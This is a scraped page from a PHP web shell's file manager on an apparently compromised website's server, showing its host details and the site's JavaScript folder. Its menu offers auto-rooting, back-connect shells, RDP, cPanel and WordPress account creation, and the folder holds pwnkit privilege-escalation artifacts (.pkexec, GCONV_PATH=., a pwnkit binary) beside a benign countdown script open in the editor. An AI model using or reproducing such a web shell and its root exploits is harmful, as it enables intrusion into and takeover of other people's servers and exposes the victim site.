Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
popbox
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
a.js
3.05
KB
-rw-r--r--
addthiswidget.js
6.67
KB
-rw-r--r--
common.js
133.68
KB
-rwxrwxrwx
common_19-01-15.js
132.19
KB
-rw-r--r--
common_19-10-15.js
133.38
KB
-rw-r--r--
conversion.js
8.91
KB
-rw-r--r--
cookies.js
2.03
KB
-rw-r--r--
countdown.js
2.33
KB
-rw-r--r--
index.php
210
B
-rw-r--r--
jquery-1.8.0.min.js
90.39
KB
-rwxrwxrwx
jquery-latest.js
246.98
KB
-rw-r--r--
jquery.accessible-news-slider....
19.84
KB
-rw-r--r--
jquery.accessible-news-slider_...
10.08
KB
-rw-r--r--
jquery.asscountdown.js
3.79
KB
-rw-r--r--
jquery.autocomplete.js
20.77
KB
-rw-r--r--
jquery.colorbox.js
25.62
KB
-rw-r--r--
jquery.colorbox_08-08-14.js
25.62
KB
-rw-r--r--
jquery.countdown.js
3.79
KB
-rw-r--r--
jquery.countdown_14-03-14.js
3.75
KB
-rw-r--r--
jquery.fancybox.js
44.81
KB
-rw-r--r--
jquery.fancybox_21-01-15.js
44.81
KB
-rw-r--r--
jquery.jplayer.min.js
54.44
KB
-rw-r--r--
jquery.js
117.81
KB
-rw-r--r--
jquery.live_time_ago_query.js
6.53
KB
-rw-r--r--
jquery.min.js
76.76
KB
-rw-r--r--
jquery.min_08-08-14.js
76.76
KB
-rw-r--r--
jquery.nivo.slider.pack.js
9.06
KB
-rw-r--r--
jquery.prettyPhoto.js
21.33
KB
-rw-r--r--
jquery.prettyPhoto_05-02-15.js
21.31
KB
-rw-r--r--
jquery.session.js
3.62
KB
-rw-r--r--
jquery.time_ago_min.js
90.62
KB
-rw-r--r--
jquery.timeago.js
4.33
KB
-rw-r--r--
jquery.uniform.js
18.89
KB
-rw-r--r--
jquery.uniform.min.js
8.08
KB
-rw-r--r--
jquery.validate.js
34.53
KB
-rw-r--r--
jquery.validate.min.js
23.95
KB
-rw-r--r--
jquery.wt-lightbox.min-.js
23.08
KB
-rw-r--r--
jquery.wt-lightbox.min-22-6-13...
9.93
KB
-rw-r--r--
jquery.wt-lightbox.min.js
25.76
KB
-rw-r--r--
jquery.wt-lightbox.min_19-03-1...
24.93
KB
-rw-r--r--
jquery.wt-lightbox.min_24-03-1...
25.73
KB
-rw-r--r--
jquery.wt-lightbox.min_new_24-...
26.5
KB
-rw-r--r--
jquery.wt-scroller.min.js
16.21
KB
-rw-r--r--
jquery_linkshwhide.js
13.13
KB
-rw-r--r--
jqueryshwhide.js
76.76
KB
-rw-r--r--
jqueryslider.js
91.44
KB
-rw-r--r--
key.js
534
B
-rw-r--r--
page.js
65.14
KB
-rw-r--r--
pramukhlib.js
20.06
KB
-rw-r--r--
preview.js
5.6
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
1.49
KB
-rw-r--r--
slidejquery-1.9.1.min.js
108.97
KB
-rw-r--r--
slidejssor.js
88.14
KB
-rw-r--r--
sliderjssor.slider.js
162.09
KB
-rw-r--r--
sliderscript.js
23.57
KB
-rw-r--r--
sliderscript_09-04-14.js
23.57
KB
-rw-r--r--
superfish.js
3.63
KB
-rw-r--r--
thickbox.js
11.33
KB
-rw-r--r--
timer.js
2.64
KB
-rwxrwxrwx
validate.js
2.03
KB
-rw-r--r--
wimpy.js
24.56
KB
-rwxrwxrwx
wowslider.js
84.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : countdown.js
(function($) { $.fn.countdown = function(options, callback) { //custom 'this' selector thisEl = $(this); //array of custom settings var settings = { 'date': null, 'format': null }; //append the settings array to options if(options) { $.extend(settings, options); } //main countdown function function countdown_proc() { eventDate = Date.parse(settings['date']) / 1000; currentDate = Math.floor($.now() / 1000); if(eventDate <= currentDate) { callback.call(this); clearInterval(interval); } seconds = eventDate - currentDate; days = Math.floor(seconds / (60 * 60 * 24)); //calculate the number of days seconds -= days * 60 * 60 * 24; //update the seconds variable with no. of days removed hours = Math.floor(seconds / (60 * 60)); seconds -= hours * 60 * 60; //update the seconds variable with no. of hours removed minutes = Math.floor(seconds / 60); seconds -= minutes * 60; //update the seconds variable with no. of minutes removed //conditional Ss if (days == 1) { thisEl.find(".timeRefDays").text("day"); } else { thisEl.find(".timeRefDays").text("days"); } if (hours == 1) { thisEl.find(".timeRefHours").text("hour"); } else { thisEl.find(".timeRefHours").text("hours"); } if (minutes == 1) { thisEl.find(".timeRefMinutes").text("minute"); } else { thisEl.find(".timeRefMinutes").text("minutes"); } if (seconds == 1) { thisEl.find(".timeRefSeconds").text("second"); } else { thisEl.find(".timeRefSeconds").text("seconds"); } //logic for the two_digits ON setting if(settings['format'] == "on") { days = (String(days).length >= 2) ? days : "0" + days; hours = (String(hours).length >= 2) ? hours : "0" + hours; minutes = (String(minutes).length >= 2) ? minutes : "0" + minutes; seconds = (String(seconds).length >= 2) ? seconds : "0" + seconds; } //update the countdown's html values. if(!isNaN(eventDate)) { thisEl.find(".days").text(days); thisEl.find(".hours").text(hours); thisEl.find(".minutes").text(minutes); thisEl.find(".seconds").text(seconds); } else { alert("Invalid date. Here's an example: 12 Tuesday 2012 17:30:00"); clearInterval(interval); } } //run the function countdown_proc(); //loop the function interval = setInterval(countdown_proc, 1000); } }) (jQuery);
Close